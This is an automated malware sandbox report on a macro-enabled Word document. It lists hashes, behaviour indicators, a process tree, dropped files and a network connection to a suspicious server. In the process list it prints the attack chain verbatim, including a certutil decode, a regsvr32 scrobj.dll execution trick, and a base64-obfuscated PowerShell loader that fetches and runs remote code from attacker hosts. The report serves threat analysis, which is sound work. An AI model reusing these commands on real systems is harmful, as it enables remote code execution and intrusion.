analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

487982bc6f4a82556f0ab3c219f55ae0.doc

Full analysis: https://app.any.run/tasks/94c5e646-cc74-4b45-9230-e658993a2ec5
Verdict: Malicious activity
Analysis date: January 11, 2019, 06:44:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 7 17:46:00 2019, Last Saved Time/Date: Mon Jan 7 17:46:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 61, Security: 0
MD5:

487982BC6F4A82556F0AB3C219F55AE0

SHA1:

0F90CC00C86536E51B8BDF6BD97F9302682B6718

SHA256:

471545026007C352F60C75355221CD13784ED3499DBD9EEB221FE7824ADE0842

SSDEEP:

3072:SkMw3UGSBdXjjQsppr2HzxznvyXvcWNl:SekGSBdBpprgzxznqXvc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 3216)
    • Application was dropped or rewritten from another process

      • cmd.exe (PID: 3044)
      • msutil.exe (PID: 3940)
      • msutil.exe (PID: 3836)
    • Changes the autorun value in the registry

      • regsvr32.exe (PID: 2544)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • msutil.exe (PID: 3940)
    • Uses REG.EXE to modify Windows registry

      • msutil.exe (PID: 3940)
      • cmd.exe (PID: 3044)
      • msutil.exe (PID: 3836)
    • Starts CertUtil for decode files

      • msutil.exe (PID: 3940)
    • Executes PowerShell scripts

      • regsvr32.exe (PID: 2544)
    • Creates files in the user directory

      • certutil.exe (PID: 3696)
      • powershell.exe (PID: 3980)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3216)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3216)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Document Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Titre
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 71
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 61
Words: 11
Pages: 1
ModifyDate: 2019:01:07 17:46:00
CreateDate: 2019:01:07 17:46:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Administrator
Template: Normal.dotm
Comments: -
Keywords: -
Author: Administrator
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe msutil.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs certutil.exe no specs regsvr32.exe powershell.exe msutil.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3216"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\487982bc6f4a82556f0ab3c219f55ae0.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3940C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.batC:\Users\admin\AppData\Local\msutil.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2680REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3473C:\Windows\system32\reg.exemsutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3044C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\cmd.exemsutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3280reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3696certutil -decode temp.txt C:\Users\admin\AppData\Roaming\3473.txtC:\Windows\system32\certutil.exemsutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2544regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\3473.txt scrobj.dllC:\Windows\system32\regsvr32.exe
msutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3980"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JHtFYFJSYG9SQWBDVGBJb05wckVmYEVyRW5DRX0gPSAoJ1NpbGVudCcrJ2x5Q29udGknKyduJysndWUnKTske1djfT1OZVctT2JKZWN0IFNZc1RFTS5OZXQuV2ViQ0xJZW5UOyR7dX09KCdNJysnb3ppbGxhLzUuJysnMCAoV2knKyduZG93cycrJyBOVCcrJyA2JysnLjE7IFdPVzY0OyBUcmlkZW50LzcuJysnMDsgcnY6MScrJzEuJysnMCcrJyknKycgbGlrZScrJyAnKydHZWNrbycpO1tTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHske1RgUnVlfX07JHt3Y30uSEVhZEVycy5BRGQoKCdVJysnc2VyLUFnZScrJ250JyksJHt1fSk7JHtXYGN9LlBSb3h5PVtTeVN0ZU0uTmV0LldFQlJlUXVlU1RdOjpERWZhdWx0V0ViUFJPWHk7JHt3Q30uUHJPWHkuQ3JFREVOVGlBbHMgPSBbU1lTVGVNLk5lVC5DckVkZU50SWFMQ0FjSEVdOjpEZUZhdWx0TkVUV09ya0NyRURlTnRJQUxTOyR7c2NySWBQVDpgcFJvYFh5fSA9ICR7V0N9LlByb3h5O2lmIChbRW52aXJvbm1lbnRdOjpPU1ZlcnNpb24uVmVyc2lvbiAtZ2UgKG5ldy1vYmplY3QgKCdWZXJzJysnaW8nKyduJykgMTAsMCkpIHsgSUVYICR7V2N9LmRvd25sb2Fkc3RyaW5nKCgnaHQnKyd0cDovLzE5JysnOC41MCcrJy4yMzkuNjMvYnlwZm81JysnZDQyJysnLnR4JysndCcpKSB9JHtrfT1bU1lTdEVNLlRFeFQuRU5Db2RpbkddOjpBU0NJSS5HZVRCeXRFcygoJzdhJysnODYxYzgnKydmJysnMTInKyc1ZTY5MycrJ2InKyc0ZTEnKycxOTIzNmY2Yzc3JysnYjgnKyc3JykpOyR7Un09eyR7ZH0sJHtrfT0ke2FSYEdTfTske1N9PTAuLjI1NTswLi4yNTV8JXske2p9PSgke2p9KyR7U31bJHtffV0rJHtLfVske199JSR7a30uQ09VbnRdKSUyNTY7JHtzfVske199XSwke3N9WyR7Sn1dPSR7U31bJHtqfV0sJHtTfVske199XX07JHtEfXwleyR7SX09KCR7aX0rMSklMjU2OyR7aH09KCR7aH0rJHtzfVske2l9XSklMjU2OyR7U31bJHtpfV0sJHtzfVske0h9XT0ke3N9WyR7aH1dLCR7U31bJHtpfV07JHtffS1CeG9yJHtTfVsoJHtTfVske2l9XSske1N9WyR7SH1dKSUyNTZdfX07JHtzYGVyfT0oJ2h0dHAnKydzOicrJy8vMTg1LicrJzEwLjY4LicrJzEnKyc4OTonKyc0NDMnKTske3R9PSgnLycrJ25ld3MnKycucGhwJyk7JHtXYEN9LkhlQWRlUnMuQUREKCgnQ29vaycrJ2llJyksKCdzZXMnKydzaW9uPVMnKydkJysnZGVlRScrJ1poJysneGEnKydYN0gnKydhc2lwcFFHeTInKyc1cWg0JysnVT0nKSk7d2hpbGUoLW5vdCAkZEF0QSl7JHtEYEFUQX09JHtXYEN9LkRvd05sb0FkRGF0QSgke1NgZVJ9KyR7dH0pO3N0YXJ0LXNsZWVwIDEwfTske0lgVn09JHtEYEF0QX1bMC4uM107JHtEYWBUQX09JHtkYEF0QX1bNC4uJHtkQWBUYX0ubGVOR3RIXTstSm9pTltDSEFSW11dKCYgJHtyfSAke2RgQXRhfSAoJHtpYFZ9KyR7a30pKXxJRVg=')) | IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
regsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3836C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.batC:\Users\admin\AppData\Local\msutil.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2524REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3515C:\Windows\system32\reg.exemsutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 229
Read events
1 043
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
4
Unknown types
7

Dropped files

PID
Process
Filename
Type
3216WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5748.tmp.cvr
MD5:
SHA256:
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B85EM9QITLDTVOTZM4LZ.temp
MD5:
SHA256:
3216WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1C13ED0.wmfwmf
MD5:88EE6104A3DE09AFFB4EDA6249796C87
SHA256:3C6F00A8949FBA764545B19E9A7E335BAFE0CF2C3619AD125CA481EC205D60F0
3216WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E440D8E6EDF168962957C33A74919A65
SHA256:8482313FCE545467D1159622521F5F0653AE8B4BDCDDC73FFA822CABCF51F85C
3216WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E6C7D4B.wmfwmf
MD5:1165E2A196D4AE5AA5659C0C00C9DCB2
SHA256:BA41C3AC81E10FC1F4150F2A2682BE77C9BD2DE483A69F8E23218AE97AEEB2A4
3216WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B38E75.wmfwmf
MD5:35EE699D786ADA7E670BB3F78F24D9F3
SHA256:89CF93346A431441CD5BC25E2B6F70096A7F4CCA6FC2DC089AEC0F6FB87B86C1
3216WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$7982bc6f4a82556f0ab3c219f55ae0.docpgc
MD5:A96C79EF2A3F77AFD19A134A4598F37F
SHA256:A00CC2CFBF4A5B6BD9778E51A4E9AE756A3AA868F6EEB526CC7BE1C8CC5684FD
3216WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:B96EA31D058925C6BD3AF4072F256386
SHA256:2D41139497F816989E2213BBB0CD44F9DEAE48773240A965A24100C5E930F4D5
3940msutil.exeC:\Users\admin\AppData\Local\Temp\temp.txttext
MD5:076458C13359B56EC7304751B5B4A353
SHA256:BD95B2FFD28EC103021563EE68AA1E031F07CDD15C6D3475B3743E7F8CA0E188
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
24
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3980
powershell.exe
185.10.68.189:443
Flokinet Ltd
SC
suspicious

DNS requests

No data

Threats

No threats detected
No debug info